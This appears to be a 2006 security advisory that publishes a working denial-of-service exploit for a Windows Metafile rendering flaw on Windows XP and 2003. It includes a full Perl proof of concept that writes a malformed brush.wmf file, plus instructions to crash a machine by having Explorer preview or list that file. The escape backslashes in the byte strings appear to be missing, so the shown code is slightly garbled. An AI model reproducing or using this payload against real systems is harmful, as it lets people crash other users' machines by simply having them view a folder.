Description:
yet another 'windows meta file' (WMF) denial of service exploit.
System affected:
+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003
Tech info:
page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.
Exploit:
=== begin of brush.pl ===
#!/usr/bin/perl
print "nWMF PoC denial of service exploit by cyanid-E <biz4rre@gmail.com>";
print "nngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf filen";
print WMF "x01x00x09x00x00x03x22x00x00x00x63x79x61x6Ex69x64";
print WMF "x2Dx45x07x00x00x00xFCx02x00x00x00x00x00x00x00x00";
print WMF "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00";
print WMF "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00";
print WMF "x00x00x00x00";
close(WMF);
print "oknnnow try to browse folder in XP explorer and wait :)n";
=== end of brush.pl ===
Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).
Discovered:
06/24/2006; vendor informed but not answered